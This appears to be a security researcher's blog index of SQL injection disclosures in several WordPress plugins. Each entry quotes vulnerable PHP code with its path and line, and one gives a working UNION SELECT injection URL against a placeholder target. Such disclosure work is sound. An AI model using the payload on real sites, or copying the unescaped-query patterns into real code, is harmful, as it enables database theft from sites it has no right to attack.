Introduction: Some time ago I have dedicated to researching about security and vulnerabilities of WordPress plugins. And the result as we can see below is very satisfactory. I have posted and helped the community to stay a bit more secure. WpVull, site that lists vulnerabilities with a focus on WordPress. …
Homepage: https://wordpress.org/plugins/link-library/ Description: Type user access: is accessible only admin user. $_GET[‘linkid’] is not escaped. Attack with Sql Injection File / Code: Path: /wp-content/plugin/link-library/link-library-admin.php Line: 686 if ( isset( $_GET[‘genthumbsingle’] ) || isset( $_GET[‘genfaviconsingle’] ) ) { $linkquery .= ” AND l.link_id = ” . $_GET[‘linkid’]; } $linkitems = $wpdb->get_results( $linkquery …
Homepage: https://wordpress.org/plugins/dsubscribers/ Description: Type user access: is accessible only admin user. $_REQUEST[‘dsubscribers’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/dsubscribers/includes/class-dsubscribers-table.php Line: 40 global $wpdb; $table_name = $wpdb->prefix . “dsubscribers”; $row = $wpdb->get_row(“SELECT * FROM $table_name WHERE id=$id”); ?> } Proof of Concept: 1 – Login with admin user: …
Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ Description: Type user access: register user. $_POST[‘CatID’] is not escaped. File / Code: Path: /wp-content/plugins/ultimate-product-catalogue/Functions/Process_Ajax.php Line: 147 global $subcategories_table_name; $Path = ABSPATH . ‘wp-load.php’; include_once($Path); global $wpdb; $SubCategories = $wpdb->get_results(“SELECT SubCategory_ID, SubCategory_Name FROM $subcategories_table_name WHERE Category_ID=” . $_POST[‘CatID’]); foreach ($SubCategories as $SubCategory) {$Response_Array[] = $SubCategory->SubCategory_ID; $Response_Array[] = $SubCategory->SubCategory_Name;} if …
Homepage: https://wordpress.org/plugins/wp-email-users/ Description: Type user access: is accessible for any registered user $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/wp-email-users/wp-email-user-ajax.php Line: 197 if($temp_sel_key == ‘select_temp’){ $myrows = $wpdb->get_results( “SELECT template_value FROM `”.$table_name.”` where id = $temp”); $data=$myrows[0]->template_value; } Proof of Concept: 1 – Login as regular user …
Homepage: https://wordpress.org/plugins/wp-custom-slider/ Description: Type user access: admin user. $_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection File / Code: Path: /wp-content/plugin/wp-custom-slider/customslider-ex-settings.php Line: 371 if(isset($_REQUEST[‘edit’])) { $id=$_REQUEST[‘edit’]; $query_pag_data=$wpdb->get_results(“select * from “.$wpdb->prefix.”customslider_images where id=$id”); ?> Proof of Concept: 1 – Login with admin user. 2 – Url with injection: http://target/wp-admin/options-general.php?page=custom_slider&showall=a&edit=0+UNION+SELECT+1,CONCAT(name,char(58),slug),3,4,5,6,7+FROM+wp_terms+WHERE+term_id=1 2 – Result: Timeline: …
Homepage: https://wordpress.org/plugins/zm-gallery/ Description: Type user access: admin user. $_GET[‘order’] is escaped wrong. Attack with Blind Injection File / Code: Path: /wp-content/plugin/zm-gallery/zm-gallery-list.php Line: 126 if( isset($_GET[‘orderby’]) ) { $order = ‘ ORDER BY ‘ . esc_sql($_GET[‘orderby’]); if( isset($_GET[‘order’]) ) { $order .= ‘ ‘ . esc_sql($_GET[‘order’]); } } $table_name = $wpdb->prefix . ‘zm_gallery’; …
Homepage: https://wordpress.org/plugins/zx-csv-upload/ Description: Type user access: admin user. $_GET[‘id’] is not escaped. Url is accessible for every registered user. File / Code: Path: /wp-content/plugin/zx-csv-upload/zx_csv_home.php Line: 53 if(isset($_POST[‘rsltsbmt’])) { $table_name = $_POST[‘table_select’]; $rlfrom=$_POST[‘rsltfrom’]; $rlto=$_POST[‘rsltto’]; } … global $wpdb; //$tname=$wpdb->prefix.’currency’; $result = $wpdb->get_results( “SELECT * FROM $table_name limit $rlfrom,$rlto”); ?> Proof of Concept: 1 …
Homepage: https://wordpress.org/plugins/wp-private-messages/ Description: Type user access: registered user. $_GET[‘id’] is not escaped. Url is accessible for every registered user. File / Code: Path: /wp-content/plugin/wp-private-messages/wpu_private_messages.php Line: 218 global $current_user, $wpulang; $id = $_GET[“id”]; $user = $_GET[“name”]; … $bf = “<tr><td class=\”left\”>”; $mid = “: </td><td>”; $af = “</td></tr>”; $pm = $wpdb->get_row(“SELECT * FROM …
Homepage: https://wordpress.org/plugins/xtremelocator/ Description: Type user access: admins user. $_GET[‘id’] is not escaped. Is accessible for only admins user. File / Code: Path: /wp-content/plugins/xtremelocator/functions.xtremelocator.php Line: 112 if((isset($_GET[‘id’])||(isset($_POST[‘action’])&&$_POST[‘action’]==”add_field”))&&!isset($_POST[‘field_action’])){ if(isset($_GET[‘id’])){ $field=$wpdb->get_results(“SELECT * FROM `”.$wpdb->prefix.”xtremelocator_fields` WHERE id=”.$_GET[‘id’]); } include_once($xl_path.”/views/add_field.php”); }else{ Proof of Concept: 1 – Using url, sqli by get: 2 – Result: Timeline: …
